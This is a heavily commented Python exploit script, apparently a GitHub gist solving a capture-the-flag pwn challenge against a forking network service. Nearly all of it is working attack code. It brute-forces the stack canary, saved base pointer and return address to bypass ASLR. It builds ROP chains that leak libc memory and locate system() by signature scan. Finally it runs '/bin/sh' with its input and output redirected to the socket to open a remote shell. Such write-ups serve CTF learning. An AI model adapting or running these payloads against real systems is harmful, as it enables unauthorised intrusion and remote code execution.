#!/usr/bin/env python | |
# | |
# learning python and making use of my ocd by sharing heavily commented scripts | |
# i've probably spent too much time on because i had nothing better to do (part 1): | |
# solution for a pwn challenge (the name of which is intentionally omitted to prevent spoilers) | |
# binary: https://bit.ly/2Pdu90o | |
# | |
# by Sami Alaoui (thedroidgeek) | |
# | |
import os | |
import sys | |
import time | |
import struct | |
import threading | |
import subprocess | |
def syncstdin(o): | |
while True: | |
line = sys.stdin.readline() | |
if line: | |
o.stdin.write(line) | |
def syncstdout(o): | |
while True: | |
line = o.stdout.readline() | |
if line: | |
sys.stdout.write(line) | |
def spawn_process(debug=False): | |
# spawn netcat process | |
p = subprocess.Popen(['nc', host, port], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) | |
# check we got a valid session | |
if 'Username: ' not in p.stdout.read(10): | |
print('unexpected nc output - check your connectivity') | |
exit() | |
# delay for debugger attachment | |
if debug: | |
print('waiting for debugger (pid: ' + str(p.pid+1) + ')...') | |
time.sleep(10) | |
return p | |
def finalize_payload(payload): | |
# input buffer gets single byte xored with 0xD before memcmp | |
for i in range(len(payload)): | |
payload = payload[:i] + chr(ord(payload[i]) ^ 0xD) + payload[i+1:] | |
return payload | |
def sig_scan(buf, sig): | |
bytes = '' | |
mask = [] | |
# extract byte array + mask from sig string | |
str_bytes = sig.split() | |
for sb in str_bytes: | |
if sb == '?': | |
mask.append(False) | |
bytes += '\0' | |
else: | |
mask.append(True) | |
bytes += chr(int(sb[0:2], 16)) | |
# buffer can't be smaller than sig | |
if len(buf) < len(mask): | |
return None | |
# scan the supplied buffer | |
for i in range(len(buf)-(len(mask)-1)): | |
for j in range(len(mask)): | |
if mask[j] and buf[i+j] != bytes[j]: | |
break | |
if j == len(mask)-1: | |
return i | |
return None | |
def main(): | |
if len(sys.argv) != 3: | |
print('usage: ' + sys.argv[0] + ' [host] [port]') | |
exit() | |
global host | |
host = sys.argv[1] | |
global port | |
port = sys.argv[2] | |
# connectivity test | |
spawn_process().stdin.write('\n') | |
# | |
# stage 1: bruteforce the stack canary, previous base pointer, and the return address | |
# in order to bypass ASLR - this is possible because the process forks itself | |
# on each socket connection, which implies preserving the address space layout | |
# of the parent process, which allows us to guess stack saved info by simply | |
# knowing whether the program successfully returned from a function call, or not | |
# (by expecting output from the caller function - 'Username found!', in our case) | |
# | |
# note: bruteforcing the return address (last 8 bytes), however, is done by using the | |
# check_username function call as an oracle (expect 'Username: ' in stdout): | |
# .text:0000XXXXXXXXXEC5 mov eax, [rbp+fd] | |
# .text:0000XXXXXXXXXEC8 mov edi, eax | |
# .text:0000XXXXXXXXXECA call check_username | |
# we use EC5 as the least significant '3 hex digits' (ASLR doesn't affect these) | |
# to eliminate the chance of accidentally calling unexpected blocking code, | |
# which would otherwise freeze the bruteforcing process... | |
# | |
print('bruteforcing stack canary, saved rbp, and retn address (24 bytes)') | |
print('hang tight, this could take a while...') | |
payload = 'davide' # the username (oracle trigger) | |
payload += 'A' * 1026 # padding | |
oracle_str = 'Username found!' | |
for i in range(24): | |
found = False | |
iter_num = 0x100 | |
if i == 16: # 1st known ret addr byte | |
byte = 0xC5 ^ 0xD | |
print('skipped #' + str(i+1) + ': ' + hex(byte)) | |
payload += chr(byte) | |
continue | |
elif i == 17: # 2nd half-known byte | |
iter_num = 0x10 | |
oracle_str = 'Username: ' # oracle change | |
for j in range(iter_num): | |
p = spawn_process() | |
if i == 17: # most significant nibble | |
curr_byte = j << 4 | 0xE ^ 0xD | |
else: | |
curr_byte = j | |
p.stdin.write(payload + chr(curr_byte)) | |
if oracle_str == p.stdout.read(len(oracle_str)): | |
found = True | |
print('got byte #' + str(i+1) + ': ' + hex(curr_byte)) | |
payload += chr(curr_byte) | |
if i > 16: # don't leave hanging prompts | |
p.stdin.write('\n') | |
break | |
if not found: | |
print('failed to get byte #' + str(i+1) + ' :(') | |
exit() | |
stack_canary = struct.unpack('<Q', payload[1032:1040])[0] ^ 0xD0D0D0D0D0D0D0D | |
stack_addr = struct.unpack('<Q', payload[1040:1048])[0] ^ 0xD0D0D0D0D0D0D0D | |
check_func = struct.unpack('<Q', payload[1048:1056])[0] ^ 0xD0D0D0D0D0D0D0D | |
print('canary: ' + hex(stack_canary)) | |
print('saved rbp: ' + hex(stack_addr)) | |
print('check_username call @ ' + hex(check_func)) | |
# | |
# stage 2: leak a libc function's address to bypass ASLR on libc | |
# using a rop chain that calls write(4, ...) on a function's .plt.got entry | |
# note that '4' is the file descriptor returned from the socket accept() call | |
# | |
print('leaking a libc address from .plt.got...') | |
p = spawn_process() | |
payload = struct.pack('<Q', check_func + 0xAE) # pop rdi ; ret | |
payload += struct.pack('<Q', 4) # 1st arg (rdi): file descriptor (socket) | |
payload += struct.pack('<Q', check_func + 0xAC) # pop rsi ; pop r15 ; ret | |
payload += struct.pack('<Q', check_func + 0x2011C3) # 2nd arg (rsi): buffer (atoi() entry on .plt.got) | |
payload += struct.pack('<Q', 0) # r15, unused | |
payload += struct.pack('<Q', check_func - 0x372) # pop rdx ; ret | |
payload += struct.pack('<Q', 8) # 3rd arg (rdx): count (sizeof(void*)) | |
payload += struct.pack('<Q', check_func - 0x5B5) # write() | |
payload += 'A' * 968 | |
payload += struct.pack('<Q', stack_canary) | |
payload += struct.pack('<Q', stack_addr - 0x488) # top of rop chain (saved rbp) | |
payload += struct.pack('<Q', check_func - 0x269) # leave ; ret (to rewind stack) | |
p.stdin.write(finalize_payload(payload)) | |
libc_atoi = struct.unpack('<Q', p.stdout.read(8))[0] | |
print('atoi @ ' + hex(libc_atoi)) | |
# | |
# stage 3: leak memory around the libc function to scan for system() with a signature | |
# since libc versions (and therefore offsets) differ across machines/distros | |
# | |
print('leaking 0x40000 bytes of libc memory...') | |
p = spawn_process() | |
payload = struct.pack('<Q', check_func + 0xAE) # pop rdi ; ret | |
payload += struct.pack('<Q', 4) # file descriptor | |
payload += struct.pack('<Q', check_func + 0xAC) # pop rsi ; pop r15 ; ret | |
payload += struct.pack('<Q', libc_atoi - 0x20000) # buffer | |
payload += struct.pack('<Q', 0) # r15 | |
payload += struct.pack('<Q', check_func - 0x372) # pop rdx ; ret | |
payload += struct.pack('<Q', 0x40000) # count | |
payload += struct.pack('<Q', check_func - 0x5B5) # write() | |
payload += 'A' * 968 | |
payload += struct.pack('<Q', stack_canary) | |
payload += struct.pack('<Q', stack_addr - 0x488) # top of rop chain | |
payload += struct.pack('<Q', check_func - 0x269) # leave ; ret | |
p.stdin.write(finalize_payload(payload)) | |
libc_dump = p.stdout.read(0x40000) | |
if len(libc_dump) == 0: | |
print('failed to receive bytes :(') | |
exit() | |
print('scanning for system()...') | |
offset = sig_scan(libc_dump, '''48 85 FF 74 0B E9 ? ? ? ? 66 0F 1F 44 00 00 ? ? ? ? ? ? ? ? ? ? ? | |
E8 ? ? ? ? 85 C0 0F 94 C0 48 83 C4 08 0F B6 C0 C3''') | |
if offset is None: | |
print('failed to find system() :(') | |
exit() | |
system_addr = libc_atoi + offset - 0x20000 | |
print('found system() at offset ' + hex(offset) + ' (' + hex(system_addr) + ')') | |
# | |
# stage 4: spawn a shell with stdin, stdout and stderr all redirected to | |
# to the socket file descriptor (4), so we can actually interact with it | |
# | |
print('popping a shell...') | |
cmd_str = '/bin/sh 0>&4 1>&4 2>&4' | |
p = spawn_process() | |
payload = struct.pack('<Q', check_func + 0xAE) # pop rdi ; ret | |
payload += struct.pack('<Q', stack_addr - 0x79 - len(cmd_str)) # command string address | |
payload += struct.pack('<Q', system_addr) # system() | |
payload += 'A' * (1007 - len(cmd_str)) | |
payload += cmd_str + '\0' # the actual command string, null terminated | |
payload += struct.pack('<Q', stack_canary) | |
payload += struct.pack('<Q', stack_addr - 0x488) # top of rop chain | |
payload += struct.pack('<Q', check_func - 0x269) # leave ; ret | |
p.stdin.write(finalize_payload(payload)) | |
# hi linux | |
p.stdin.write('uname -a\n') | |
# emulate an interactive shell | |
stdint = threading.Thread(target=syncstdin, args=(p,)) | |
stdoutt = threading.Thread(target=syncstdout, args=(p,)) | |
stdint.daemon = True | |
stdoutt.daemon = True | |
stdint.start() | |
stdoutt.start() | |
# wait for nc session to terminate | |
p.wait() | |
if __name__ == '__main__': | |
try: | |
main() | |
except KeyboardInterrupt: | |
try: | |
sys.exit(0) | |
except SystemExit: | |
os._exit(0) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment